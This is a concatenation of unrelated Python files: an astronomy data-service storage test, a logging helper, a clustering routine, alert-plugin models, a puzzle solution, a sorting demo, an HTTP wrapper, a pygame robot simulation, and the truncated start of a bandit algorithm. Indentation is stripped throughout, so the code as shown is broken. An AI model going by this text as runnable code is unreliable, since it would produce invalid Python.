"(ra > 180 and ra < 180.1 and dec > -36.3 and dec < -36.2) "\
"order by ra limit 2"
qryadql = "select TOP 2 id,ra,dec from smash_dr1.object where "\
"(ra > 180 and ra < 180.1 and dec > -36.3 and dec < -36.2) "\
"order by ra"
# Test query results
qryrescsv = 'id,ra,dec\n'\
'109.127614,180.000153966131,-36.2301641016901\n'\
'109.128390,180.000208026483,-36.2290234336001\n'
qryresascii = '109.127614\t180.000153966131\t'\
'-36.2301641016901\n109.128390\t'\
'180.000208026483\t-36.2290234336001\n'
qryid = np.array(['109.127614','109.128390'])
qryra = np.array([180.000153966, 180.000208026])
qrydec = np.array([-36.2301641017, -36.2290234336])
qryresvotablesql = '<?xml version="1.0" encoding="utf-8"?>\n<!-- Produced with astropy.io.votable version 1.3.2\n http://www.astropy.org/ -->\n<VOTABLE version="1.2" xmlns="http://www.ivoa.net/xml/VOTable/v1.2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.ivoa.net/xml/VOTable/v1.2">\n <RESOURCE type="results">\n <TABLE>\n <FIELD ID="id" arraysize="10" datatype="char" name="id"/>\n <FIELD ID="ra" datatype="double" name="ra"/>\n <FIELD ID="dec" datatype="double" name="dec"/>\n <DATA>\n <TABLEDATA>\n <TR>\n <TD>109.127614</TD>\n <TD>180.00015396613099</TD>\n <TD>-36.2301641016901</TD>\n </TR>\n <TR>\n <TD>109.128390</TD>\n <TD>180.00020802648299</TD>\n <TD>-36.229023433600098</TD>\n </TR>\n </TABLEDATA>\n </DATA>\n </TABLE>\n </RESOURCE>\n</VOTABLE>\n'
qryresvotableadql = '<?xml version="1.0" encoding="UTF-8"?>\n<VOTABLE xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\nxsi:noNamespaceSchemaLocation="xmlns:http://www.ivoa.net/xml/VOTable-1.2.xsd" version="1.2">\n<RESOURCE type="results">\n<DESCRIPTION>DALServer TAP Query</DESCRIPTION>\n<INFO name="QUERY_STATUS" value="OK"/>\n<INFO name="QUERY" value="select TOP 2 id,ra,dec from smash_dr1.object where (ra > 180 and ra < 180.1 and dec > -36.3 and dec < -36.2) order by ra"/>\n<INFO name="TableRows" value="2"/>\n<TABLE>\n<FIELD ID="id" name="id" datatype="char" ucd="meta.id;meta.main" arraysize="10" unit="None">\n<DESCRIPTION>Unique ID for this object, the field name plus a running number</DESCRIPTION>\n</FIELD>\n<FIELD ID="ra" name="ra" datatype="double" ucd="pos.eq.ra;meta.main" unit="Degrees">\n<DESCRIPTION>Right Ascension (J2000.0) of source, in degrees</DESCRIPTION>\n</FIELD>\n<FIELD ID="dec" name="dec" datatype="double" ucd="pos.eq.dec;meta.main" unit="Degrees">\n<DESCRIPTION>Declination (J2000.0) of source, in degrees</DESCRIPTION>\n</FIELD>\n<DATA>\n<TABLEDATA>\n<TR><TD>109.127614</TD><TD>180.00015396613091</TD><TD>-36.230164101690086</TD></TR>\n<TR><TD>109.128390</TD><TD>180.00020802648334</TD><TD>-36.22902343360014</TD></TR>\n</TABLEDATA>\n</DATA>\n</TABLE>\n</RESOURCE>\n</VOTABLE>\n'
def login(dl):
token = authClient.login('dltest','datalab')
dl.loginuser = 'dltest'
dl.dl.save("login", "status", "loggedin")
dl.dl.save("login", "user", "dltest")
dl.dl.save("login", "authtoken", token)
dl.dl.save("dltest", "authtoken", token)
dl.loginstatus = "loggedin"
def logout(dl):
token = dl.dl.get('login','authtoken')
user, uid, gid, hash = token.strip().split('.', 3)
res = authClient.logout (token)
dl.dl.save("login", "status", "loggedout")
dl.dl.save("login", "user", "")
dl.dl.save("login", "authtoken", "")
dl.loginstatus = "loggedout"
def suite():
suite = unittest.TestSuite()
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestHelp))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestLogin))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestLogout))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestStatus))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestWhoami))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestServiceStatus))
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestList))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestGet))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestPut))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestCopy))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestMove))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestRemove))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestMkdir))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestRmdir))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestLink))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestLoad))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestSave))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestCopyURL))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQuery))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQueryHistory))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQueryResults))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQueryStatus))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestQueryProfiles))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestSchema))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestDropTable))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestExportTable))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestListDB))
#suite.addTest(unittest.TestLoader().loadTestsFromTestCase(TestSIAQuery))
return suite
class TestList(unittest.TestCase):
def setUp(self):
self.file1 = 'lstest1.csv'
self.file2 = 'lstest2.csv'
self.dir1 = 'lstest1'
self.dir2 = 'lstest2'
self.file3 = self.dir1+'/'+self.file1
self.testdata = testdata
fh = open(self.file1,'w')
fh.write(testdata)
fh.close()
# Delete input file1 if it exists already
if storeClient.ls(TEST_TOKEN,self.file1,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file1)
# Delete input file2 if it exists already
if storeClient.ls(TEST_TOKEN,self.file2,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file2)
# Create dir1 if it does NOT exist already
if storeClient.ls(TEST_TOKEN,self.dir1,'csv') == '':
storeClient.mkdir(TEST_TOKEN,self.dir1)
# Delete dir2 if it exists already
if storeClient.ls(TEST_TOKEN,self.dir2,'csv') != '':
storeClient.rmdir(TEST_TOKEN,self.dir2)
# Put local file to VOSpace
storeClient.put(TEST_TOKEN,self.file1,self.file1)
# Put local file to VOSpace directory
storeClient.put(TEST_TOKEN,self.file1,self.file3)
# Delete temporary local test file
os.remove(self.file1)
def tearDown(self):
# Delete file1 if it exists
if storeClient.ls(TEST_TOKEN,self.file1,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file1)
# Delete file2 if it exists
if storeClient.ls(TEST_TOKEN,self.file2,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file2)
# Delete file2 if it exists
if storeClient.ls(TEST_TOKEN,self.file3,'csv') != '':
storeClient.rm(TEST_TOKEN,self.file3)
# Delete dir1 if it exists
if storeClient.ls(TEST_TOKEN,self.dir1,'csv') != '':
storeClient.rmdir(TEST_TOKEN,self.dir1)
# Delete dir2 if it exists
if storeClient.ls(TEST_TOKEN,self.dir2,'csv') != '':
storeClient.rmdir(TEST_TOKEN,self.dir2)
def test_list(self):
pass
#dl = Dlinterface()
#login(dl)
## Make sure that file1 exists in VOSpace
#with Capturing() as output:
# dl.ls(self.file1)
#self.assertEqual(output[0].strip(),self.file1)
## Make sure that file2 does NOT exist in VOSpace
#with Capturing() as output:
# dl.ls(self.file2)
#self.assertEqual(output[0].strip(),'')
## Make sure that file3 exists in VOSpace
#with Capturing() as output:
# dl.ls(self.file3)
#self.assertEqual(output[0].strip(),os.path.basename(self.file3))
## Make sure that dir1 exists in VOSpace and contains file3
## which has the same base name as file1
#with Capturing() as output:
# dl.ls(self.dir1)
#self.assertEqual(output[0].strip(),self.file1)
## Make sure that dir2 does NOT exist in VOSpace
#with Capturing() as output:
# dl.ls(self.dir2)
#self.assertEqual(output[0].strip(),'')
#logout(dl)
if __name__ == '__main__':
suite = suite()
unittest.TextTestRunner(verbosity = 2).run(suite)
|
# -*- coding: utf-8 -*-
## \package globals.debug
# MIT licensing
# See: LICENSE.txt
from globals.commandline import GetOption
class dmode:
QUIET = 0
INFO = 1
WARN = 2
ERROR = 3
DEBUG = 4
name = {
QUIET: u'QUIET',
INFO: u'INFO',
WARN: u'WARN',
ERROR: u'ERROR',
DEBUG: u'DEBUG',
}
LogLevel = dmode.ERROR
def SetLogLevel(lvl):
global LogLevel
if isinstance(lvl, int):
LogLevel = lvl
return True
if isinstance(lvl, (unicode, str)):
if lvl.isnumeric():
LogLevel = int(lvl)
return True
for L in dmode.name:
if lvl.upper() == dmode.name[L]:
LogLevel = L
return True
return False
new_level = GetOption(u'log-level')
if new_level != None:
SetLogLevel(new_level)
def dprint(msg, mode, module=None, line=None, newline=True):
if mode <= LogLevel:
if module != None:
if line != None:
msg = u'[{}:{}] {}'.format(module, line, msg)
mode = dmode.name[mode]
if newline:
mode = u'\n{}'.format(mode)
print(u'{}: {}'.format(mode, msg))
def pDebug(msg, module=None, line=None, newline=True):
dprint(msg, dmode.DEBUG, module, line, newline)
def pError(msg, module=None, line=None, newline=True):
dprint(msg, dmode.ERROR, module, line, newline)
def pInfo(msg, module=None, line=None, newline=True):
dprint(msg, dmode.INFO, module, line, newline)
def pWarn(msg, module=None, line=None, newline=True):
dprint(msg, dmode.WARN, module, line, newline)
|
import numpy as np
from . import UncertMath
class ClusterList(object):
def __init__(self,ratios,nbins):
super(ClusterList, self).__init__()
self.nbins = nbins
self.ratios = ratios
# Create an array to hold bin assignments and initial set all to -1 == not clustered
self.bin_assign = np.empty((nbins,),dtype=np.int)
self.bin_assign.fill(-1)
# Initialize an ucert container to hold per bin information; initially mask all elements
# note: masking is implicit since rates set to 0
dum_data = np.zeros((nbins,))
self.bin_data = UncertMath.UncertContainer(dum_data.copy(),dum_data.copy(),dum_data.copy())
self.cluster_id = 0 # ID of newest cluster
self.cluster_contents = {} # Dictionary containing sets of bin ids with keys = cluster ids
def join(self,pairs):
""" Join clusters given a tuple (i,j) of bin pairs
"""
for i,j in zip(*pairs):
# Both bins not joined
if self.bin_assign[i] == -1 and self.bin_assign[j] == -1:
# Create new cluster
self.bin_assign[i] = self.cluster_id
self.bin_assign[j] = self.cluster_id
self.cluster_contents[self.cluster_id] = {i,j}
self.cluster_id += 1
rij = self.ratios[i,j]
denom = rij + 1.0
self.bin_data[i] = rij/denom # relative probability for bin i
self.bin_data[j] = denom.recip() # relative probability for bin j
# Only one bin previously assigned to a cluster
elif self.bin_assign[i] == -1 or self.bin_assign[j] == -1:
if self.bin_assign[i] == -1:
idum,jdum = i,j
else:
idum,jdum = j,i
jclust = self.bin_assign[jdum]
jclust_mid = np.where(self.bin_assign == jclust)[0] # index of bins in jclust
rik = self.ratios[idum,jclust_mid]
pk = self.bin_data[jclust_mid]
piTmp = rik * pk # estimate for p_idum / P_cluster based on 'path' through bin k
# Note that here P_cluster is value before addition of bin idum
piTmp_avg = piTmp.weighted_average(axis=0)
# now, compute relative prob of each bin in *new* cluster (including bin idum)
denom = piTmp_avg + 1.0
self.bin_data[idum] = piTmp_avg / denom
# Update bins already in cluster
self.bin_data[jclust_mid] = self.bin_data[jclust_mid] / denom
# Move bin idum into cluster jclust
self.bin_assign[idum] = jclust
self.cluster_contents[jclust].update({idum})
# Both bins previously assigned to different cluster; Join clusters
elif not self.bin_assign[i] == self.bin_assign[j]:
iclust = self.bin_assign[i]
jclust = self.bin_assign[j]
iclust_mid = np.where(self.bin_assign == iclust)[0] # indx of bins in cluster i
jclust_mid = np.where(self.bin_assign == jclust)[0] # indx of bins in cluster j
niclust = iclust_mid.size
njclust = jclust_mid.size
dum_data = np.zeros((niclust*njclust,))
ij_cluster_ratio = UncertMath.UncertContainer(dum_data.copy(),dum_data.copy(),dum_data.copy())
for count,im in enumerate(iclust_mid):
rij = self.ratios[im,jclust_mid]
pi = self.bin_data[im]
pj = self.bin_data[jclust_mid]
ij_cluster_ratio[count*njclust:(count+1)*njclust] = rij * pj / pi
ij_cluster_ratio = ij_cluster_ratio.weighted_average(axis=0)
idenom = ij_cluster_ratio.recip() + 1.0
jdenom = ij_cluster_ratio + 1.0
self.bin_data[iclust_mid] = self.bin_data[iclust_mid] / idenom
self.bin_data[jclust_mid] = self.bin_data[jclust_mid] / jdenom
# Join all bins in cluster j into cluster iclust
self.bin_assign[jclust_mid] = iclust
# Move contents of jclust into iclust
self.cluster_contents[iclust].update(self.cluster_contents[jclust])
# Clear contents of jclust
self.cluster_contents[jclust].clear()
if len(self.cluster_contents[iclust]) == self.nbins:
break
def join_simple(self,pairs):
""" Join clusters using direct ratios given a tuple (i,j) of bin pairs
"""
for i,j in zip(*pairs):
# Both bins not joined
if self.bin_assign[i] == -1 and self.bin_assign[j] == -1:
# Create new cluster
self.bin_assign[i] = self.cluster_id
self.bin_assign[j] = self.cluster_id
self.cluster_contents[self.cluster_id] = {i,j}
self.cluster_id += 1
rij = self.ratios[i,j]
denom = rij + 1.0
self.bin_data[i] = rij/denom # relative probability for bin i
self.bin_data[j] = denom.recip() # relative probability for bin j
# Only one bin previously assigned to a cluster
elif self.bin_assign[i] == -1 or self.bin_assign[j] == -1:
if self.bin_assign[i] == -1:
idum,jdum = i,j
else:
idum,jdum = j,i
jclust = self.bin_assign[jdum]
rik = self.ratios[idum,jdum]
pk = self.bin_data[jdum]
piTmp = rik * pk # estimate for p_idum / P_cluster based on 'path' through bin k
# Note that here P_cluster is value before addition of bin idum
# now, compute relative prob of each bin in *new* cluster (including bin idum)
denom = piTmp + 1.0
self.bin_data[idum] = piTmp / denom
# Update bins already in cluster
jclust_mid = np.where(self.bin_assign == jclust) # index of bins in jclust
self.bin_data[jclust_mid] = self.bin_data[jclust_mid] / denom
# Move bin idum into cluster jclust
self.bin_assign[idum] = jclust
self.cluster_contents[jclust].update({idum})
# Both bins previously assigned to different cluster; Join clusters
elif not self.bin_assign[i] == self.bin_assign[j]:
iclust = self.bin_assign[i]
jclust = self.bin_assign[j]
rij = self.ratios[i,j]
pi = self.bin_data[i]
pj = self.bin_data[j]
ij_cluster_ratio = rij * pj / pi
idenom = ij_cluster_ratio.recip() + 1.0
jdenom = ij_cluster_ratio + 1.0
iclust_mid = np.where(self.bin_assign == iclust)
self.bin_data[iclust_mid] = self.bin_data[iclust_mid] / idenom
jclust_mid = np.where(self.bin_assign == jclust)
self.bin_data[jclust_mid] = self.bin_data[jclust_mid] / jdenom
# Join all bins in cluster j into cluster iclust
self.bin_assign[jclust_mid] = iclust
# Move contents of jclust into iclust
self.cluster_contents[iclust].update(self.cluster_contents[jclust])
# Clear contents of jclust
self.cluster_contents[jclust].clear()
if len(self.cluster_contents[iclust]) == self.nbins:
break
|
import logging
from django.db import models
from polymorphic.models import PolymorphicModel
from cabot.cabotapp.utils import create_failing_service_mock
logger = logging.getLogger(__name__)
class AlertPlugin(PolymorphicModel):
title = models.CharField(max_length=30, unique=True, editable=False)
enabled = models.BooleanField(default=True)
author = None
# Plugins use name field
name = 'noop'
def __unicode__(self):
return u'%s' % (self.title)
def send_alert(self, service, users, duty_officers):
"""
Implement a send_alert function here that shall be called.
"""
return True
def send_test_alert(self, user):
"""
Send a test alert when the user requests it (to make sure config is valid).
The default implementation creates a fake Service and StatusCheck and calls the normal send_alert().
Note that the service/check may not be fully configured (e.g. invalid primary key, no HipChat room ID, ...).
:param user: django user
:return: nothing, raise exceptions on error
"""
service_mock = create_failing_service_mock()
self.send_alert(service_mock, [], [user])
class AlertPluginUserData(PolymorphicModel):
title = models.CharField(max_length=30, editable=False)
user = models.ForeignKey('UserProfile', editable=False, on_delete=models.CASCADE)
# This is used to add the "Send Test Alert" button to the edit page.
# We need this information to be able to map AlertPluginUserData subclasses to their AlertPlugins.
# It's a list because some plugins (like Twilio) have multiple alert types for one user data type.
alert_classes = []
class Meta:
unique_together = ('title', 'user',)
def __unicode__(self):
return u'%s' % (self.title)
def is_configured(self):
"""
Override this to show warnings in the profile sidebar when something's not set up (i.e. a field is empty).
NOTE: This does NOT do validation when submitting the 'update profile' form. You should specify
models.SomeField(validators=[...]) when declaring your model's fields for that.
"""
return True
def send_alert(service, duty_officers=[], fallback_officers=[]):
users = service.users_to_notify.filter(is_active=True)
for alert in service.alerts.all():
try:
alert.send_alert(service, users, duty_officers)
except Exception:
logging.exception('Could not sent {} alert'.format(alert.name))
if fallback_officers:
try:
alert.send_alert(service, users, fallback_officers)
except Exception:
logging.exception('Could not send {} alert to fallback officer'.format(alert.name))
def update_alert_plugins():
for plugin_subclass in AlertPlugin.__subclasses__():
plugin_subclass.objects.get_or_create(title=plugin_subclass.name)
return AlertPlugin.objects.all()
|
from statistics import median
map_open_close = {"{": "}", "[": "]", "(": ")", "<": ">"}
score_part_1 = {
"}": 1197,
"]": 57,
")": 3,
">": 25137,
}
score_part_2 = {
"}": 3,
"]": 2,
")": 1,
">": 4,
}
def score_line(line: str) -> tuple[int, int]:
"""if the line is corrupted, then compute score of part 1, else compute score of part 2"""
stack = []
for c in line:
if c in map_open_close:
stack.append(c)
else:
try:
e = stack.pop()
except IndexError:
return score_part_1[c], 0
if map_open_close[e] != c:
return score_part_1[c], 0
# complete string
s = 0
for e in stack[::-1]:
s *= 5
s += score_part_2[map_open_close[e]]
return 0, s
score_1 = 0
scores_2 = []
with open("input.txt") as f:
for line in f.readlines():
s1, s2 = score_line(line.strip())
score_1 += s1
if s2 != 0:
scores_2.append(s2)
print("part1:", score_1)
print("part2:", median(scores_2))
|
from dataclasses import dataclass
from typing import ClassVar
import datetime
@dataclass
class Some_Class:
some_const: ClassVar[int] = 20
some_int: int
some_float: float
some_float_less_than_3: float
some_datetime: datetime.datetime
some_use_of_const: int
def __post_init__(self):
"""our class consistency checks to be performed after initialization."""
# this risks to not be executed in release mode...
# assert self.some_float_less_than_3 < 3, f"got {self.some_float_less_than_3} for some_float_less_than_3"
if self.some_float_less_than_3 > 3:
raise RuntimeError(f"got {self.some_float_less_than_3} for some_float_less_than_3"
)
some_class_instance = Some_Class(
some_int = 1,
some_float = 3.14,
some_float_less_than_3 = 2.4,
some_datetime = datetime.datetime.fromtimestamp(42),
some_use_of_const = Some_Class.some_const * 4
)
print(some_class_instance)
some_class_instance_erroneous = Some_Class(
some_int = 1,
some_float = 3.14,
some_float_less_than_3 = 3.4,
some_datetime = datetime.datetime.fromtimestamp(42)
)
print(some_class_instance_erroneous)
|
"""使用Python实现选择排序,并分析时间复杂度"""
#时间复杂度:O(n**2)
def selection_sort(lst):
for i in range(len(lst) - 1):
min_index = i
for j in range(i + 1, len(lst)):
if lst[j] < lst[min_index]:
min_index = j
if min_index != i:
lst[i], lst[min_index] = lst[min_index], lst[i]
li = [45, 234, 34, 34, 9, 3465, 234, 1]
print("origin lst", li)
selection_sort(li)
print("selection_sort_list", li)
|
# -*- coding: utf-8 -*-
"""Implements a simple wrapper around urlopen."""
import logging
from functools import lru_cache
from http.client import HTTPResponse
from typing import Iterable, Dict, Optional
from urllib.request import Request
from urllib.request import urlopen
logger = logging.getLogger(__name__)
def _execute_request(
url: str, method: Optional[str] = None, headers: Optional[Dict[str, str]] = None
) -> HTTPResponse:
base_headers = {"User-Agent": "Mozilla/5.0"}
if headers:
base_headers.update(headers)
if url.lower().startswith("http"):
request = Request(url, headers=base_headers, method=method)
else:
raise ValueError("Invalid URL")
return urlopen(request) # nosec
def get(url) -> str:
"""Send an http GET request.
:param str url:
The URL to perform the GET request for.
:rtype: str
:returns:
UTF-8 encoded string of response
"""
return _execute_request(url).read().decode("utf-8")
def stream(
url: str, chunk_size: int = 4096, range_size: int = 9437184
) -> Iterable[bytes]:
"""Read the response in chunks.
:param str url: The URL to perform the GET request for.
:param int chunk_size: The size in bytes of each chunk. Defaults to 4KB
:param int range_size: The size in bytes of each range request. Defaults to 9MB
:rtype: Iterable[bytes]
"""
file_size: int = range_size # fake filesize to start
downloaded = 0
while downloaded < file_size:
stop_pos = min(downloaded + range_size, file_size) - 1
range_header = f"bytes={downloaded}-{stop_pos}"
response = _execute_request(url, method="GET", headers={"Range": range_header})
if file_size == range_size:
try:
content_range = response.info()["Content-Range"]
file_size = int(content_range.split("/")[1])
except (KeyError, IndexError, ValueError) as e:
logger.error(e)
while True:
chunk = response.read(chunk_size)
if not chunk:
break
downloaded += len(chunk)
yield chunk
return # pylint: disable=R1711
@lru_cache(maxsize=None)
def filesize(url: str) -> int:
"""Fetch size in bytes of file at given URL
:param str url: The URL to get the size of
:returns: int: size in bytes of remote file
"""
return int(head(url)["content-length"])
def head(url: str) -> Dict:
"""Fetch headers returned http GET request.
:param str url:
The URL to perform the GET request for.
:rtype: dict
:returns:
dictionary of lowercase headers
"""
response_headers = _execute_request(url, method="HEAD").info()
return {k.lower(): v for k, v in response_headers.items()}
|
from math import pi, sin, cos
import random
import pygame
from level import TILE_SIZE, CHARGERS_PER_STATION, tilepos_to_screenpos
from level import NORTH, EAST, SOUTH, WEST
from sensor import tiles_to
from main import FRAME_RATE
texture = pygame.image.load("res/robot{}.png".format(TILE_SIZE))
texture_unloading = pygame.image.load("res/robot_unloading{}.png".format(TILE_SIZE))
texture_loaded = pygame.image.load("res/robot_loaded{}.png".format(TILE_SIZE))
class Processor(object):
BATTERY_LOW = 0.5
BATTERY_HIGH = 1.0
def __init__(self, robot):
self.robot = robot
self.robot.processor = self
self.state = 'charging'
self.chargeport_pos = self.robot.rect.left//3*3, self.robot.rect.bottom
self.station_entrance_pos = self.chargeport_pos[0] + 1, 0
self.station_exit_pos = self.chargeport_pos[0] + 2, 0
def tick(self):
if self.state == 'charging':
self.robot.battery += 0.12 / FRAME_RATE
if self.robot.battery >= Processor.BATTERY_HIGH:
self.enque()
def enque(self):
self.robot.driveTo(self.station_exit_pos)
self.state = 'queueing'
def arrived(self):
if self.state == 'queueing':
self.deliver()
elif self.state == 'delivering':
self.robot.loaded = False
self.robot.unload()
elif self.state == 'returning_to_station':
if self.robot.battery < Processor.BATTERY_LOW:
self.charge()
else:
self.enque()
elif self.state == 'returning_to_charging':
self.state = 'charging'
def charge(self):
self.robot.driveTo(self.chargeport_pos)
self.state = 'returning_to_charging'
def return_to_station(self):
self.state = 'returning_to_station'
self.robot.driveTo(self.station_entrance_pos)
def unloaded(self):
self.return_to_station()
def deliver(self):
self.state = 'delivering'
self.robot.loaded = True
x = 0 + 3 * random.randint(0,12)
y = 1 + 3 * random.randint(1,CHARGERS_PER_STATION)
self.robot.driveTo((x,y))
class Robot(object):
ROBOCOUNT = 0
def __init__(self, x, y):
self.rect = pygame.Rect(x, y-1, 1, 1)
self.state = "stopped"
self.offset = [0,0]
self.heading = 0
self.unloading = False
self.moving = False
self.target = None
self.moves = []
self.data = None
self.processor = Processor(self)
Robot.ROBOCOUNT += 1
self.id = Robot.ROBOCOUNT
self.loaded = False
self.battery = 0.8
self.speed = 4.0 # tiles per second
self.unload_time = 0.5 # seconds
def __str__(self):
return "Robot {}".format(self.id)
def draw(self, screen, viewport):
if self.target:
self._draw_line_to(screen, viewport, self.target, (250,250,250))
x, y = self.rect.left, self.rect.bottom
x += self.offset[0]
y += self.offset[1]
rx, ry = tilepos_to_screenpos((x,y), viewport)
rect = pygame.Rect(rx, ry, TILE_SIZE, TILE_SIZE)
t = texture
if self.unloading:
t = texture_unloading
elif self.loaded:
t = texture_loaded
surface = pygame.transform.rotate(t, self.heading)
srect = surface.get_rect()
srect.center = rect.center
screen.blit(surface, srect)
pygame.draw.arc(screen, (250,250,250), rect.inflate(-16,-16), 0, max(0,self.battery)*2*pi, 4)
# if self.data.blocked_crossroad_ahead: pygame.draw.circle(screen, (255,0,0), (rx+16,ry+16), 8, 2)
def _draw_line_to(self, screen, viewport, pos, color):
rx, ry = self.rect.left, self.rect.bottom
rx += self.offset[0] + 0.5
ry += self.offset[1] - 0.5
rx, ry = tilepos_to_screenpos((rx,ry), viewport)
tx, ty = pos[0] + 0.5, pos[1] - 0.5
tx, ty = tilepos_to_screenpos((tx,ty), viewport)
pygame.draw.line(screen, color, (rx,ry), (tx,ty))
def tick(self):
self.processor.tick()
self.moving = len(self.moves) > 0
if len(self.moves):
finished = self.moves[0].tick(self)
if finished:
self.battery -= 0.005
del self.moves[0]
self.offset[0] = round(self.offset[0])
self.offset[1] = round(self.offset[1])
dx, self.offset[0] = self.offset[0] // 1, self.offset[0] % 1
dy, self.offset[1] = self.offset[1] // 1, self.offset[1] % 1
self.rect.move_ip(dx, dy)
def driveForward(self):
def forward(robot, data):
steps, remaining = data
if robot.heading == NORTH:
robot.offset[1] = 1 - remaining/steps
elif robot.heading == WEST:
robot.offset[0] = -1 + remaining/steps
elif robot.heading == SOUTH:
robot.offset[1] = -1 + remaining/steps
elif robot.heading == EAST:
robot.offset[0] = 1 - remaining/steps
return remaining==0, (steps, remaining -1 )
steps = FRAME_RATE // self.speed
self.moves.append(Move(forward, (steps, steps)))
def turnLeft(self):
steps = FRAME_RATE // self.speed
def left(robot, data):
steps, remaining = data
robot.heading += 90 / steps
if remaining == 1:
robot.heading = round(robot.heading) % 360
return remaining==1, (steps, remaining -1 )
self.moves.append(Move(left, (steps, steps)))
def turnRight(self):
steps = FRAME_RATE // self.speed
def right(robot, data):
steps, remaining = data
robot.heading -= 90 / steps
if remaining == 1:
robot.heading = round(robot.heading) % 360
return remaining==1, (steps, remaining -1 )
self.moves.append(Move(right, (steps, steps)))
def start_unloading(self):
steps = FRAME_RATE * self.unload_time
def unload(robot, data):
steps, remaining = data
if steps == remaining:
robot.unloading = True
elif remaining == 1:
robot.unloading = False
robot.unloaded()
return True, (steps, remaining -1 )
return False, (steps, remaining -1 )
self.moves.append(Move(unload, (steps, steps)))
def driveTo(self, target):
if self.state != 'stopped':
return
self.target = target
self.state = 'driving.initial'
def unloaded(self):
if self.state == 'unloading':
self.state = 'stopped'
self.processor.unloaded()
def unload(self):
# movements are blocking
if self.moving:
return
if self.state == 'stopped':
self.start_unloading()
self.state = 'unloading'
def sensorData(self, data):
self.data = data
# movements are blocking
if self.moving:
return
if self.state == 'stopped':
pass
elif self.state == 'unloading':
pass
elif self.state == 'driving.initial':
if self._target_reached():
self.state = 'stopped'
self.target = None
self.processor.arrived()
else:
if data.pos_type == 'waypoint':
self.state = 'driving.waypoint.initial'
elif data.pos_type == 'station':
self._station_behavior()
elif self.state.startswith('driving.waypoint'):
return self._states_waypoint()
else:
print("unknown state", self.state)
def _station_behavior(self):
to_charging_below = self.target[0]%3 ==0 and self.target[0] + 1 == self.data.pos[0] and self.target[1] <= self.data.pos[1]
if to_charging_below:
if self.data.pos[1] == self.target[1] and self.data.pos_orientation != WEST:
self.turnRight()
elif not self.data.blocked_front:
self.driveForward()
else:
direction, left = self._station_traffic_direction()
if self.data.pos_orientation != direction:
if left:
self.turnLeft()
else:
self.turnRight()
elif not self.data.blocked_front:
self.driveForward()
def _station_traffic_direction(self):
""" return tuple of which direction to go and wether to use left turns for doing so (else use right turns) """
xmod3 = self.data.pos[0] % 3
if xmod3 == 0 or self.data.pos[1] == -2-CHARGERS_PER_STATION and xmod3 == 1:
return EAST, True
elif xmod3 == 1:
return SOUTH, False
else:
return NORTH, True
def _states_waypoint(self):
direction = self._target_direction()
if self.state == 'driving.waypoint.initial':
if direction == 'behind':
if self.data.blocked_left:
self.state = 'driving.waypoint.checkpriority'
else:
self.turnLeft()
self.state = 'driving.waypoint.turnaround.wait'
else:
self.state = 'driving.waypoint.checkpriority'
elif self.state == 'driving.waypoint.turnaround.wait':
if not (self.data.blocked_crossroad_right or self.data.blocked_front):
self.driveForward()
self.turnLeft()
else:
self.turnRight()
self.state = 'driving.initial'
elif self.state == 'driving.waypoint.checkpriority':
right_before_left = not self.data.blocked_waypoint_right
stalemate = self.data.blocked_waypoint_right and self.data.blocked_waypoint_ahead and self.data.blocked_waypoint_left and self.data.pos_orientation in [NORTH, SOUTH]
crossroad_free = not self.data.blocked_crossroad_ahead
if (right_before_left or stalemate) and crossroad_free:
self.driveForward()
if direction == 'right':
self.turnRight()
self.state = 'driving.waypoint.leavecrossroad'
elif direction == 'ahead' or direction == 'behind':
self.driveForward()
self.state = 'driving.waypoint.leavecrossroad'
elif direction == 'left':
self.driveForward()
self.turnLeft()
self.state = 'driving.waypoint.finishleftturn'
elif self.state == 'driving.waypoint.finishleftturn':
if not self.data.blocked_front:
self.driveForward()
self.state = 'driving.waypoint.leavecrossroad'
elif self.state == 'driving.waypoint.leavecrossroad':
if not self.data.blocked_front:
self.driveForward()
self.state = 'driving.initial'
else:
self.turnLeft()
self.state = 'driving.waypoint.finishleftturn'
def _target_reached(self):
return self.target == self.data.pos
def _target_direction(self):
tx, ty= tiles_to(self.data.pos, self.heading, self.target)
result = None
if ty > 3 or ty == 3 and tx in [-1, 0]:
result = 'ahead'
elif ty == 0 and tx == -1:
result = 'behind'
elif ty < 0:
result = 'behind'
elif tx > 0:
result = 'right'
elif tx < -1:
result = 'left'
return result
class Move(object):
function = None
data = None
def __init__(self, function, initial_data):
self.function = function
self.data = initial_data
def tick(self, robot):
"""return true when finished"""
finished, new_data = self.function(robot, self.data)
self.data = new_data
return finished
|
from typing import List, Tuple, Optional
import numpy as np
from banditpylib.arms import PseudoArm
from .utils import OrdinaryLearner
class UCBV(OrdinaryLearner):
r"""UCBV policy :cite:`audibert2009exploration`
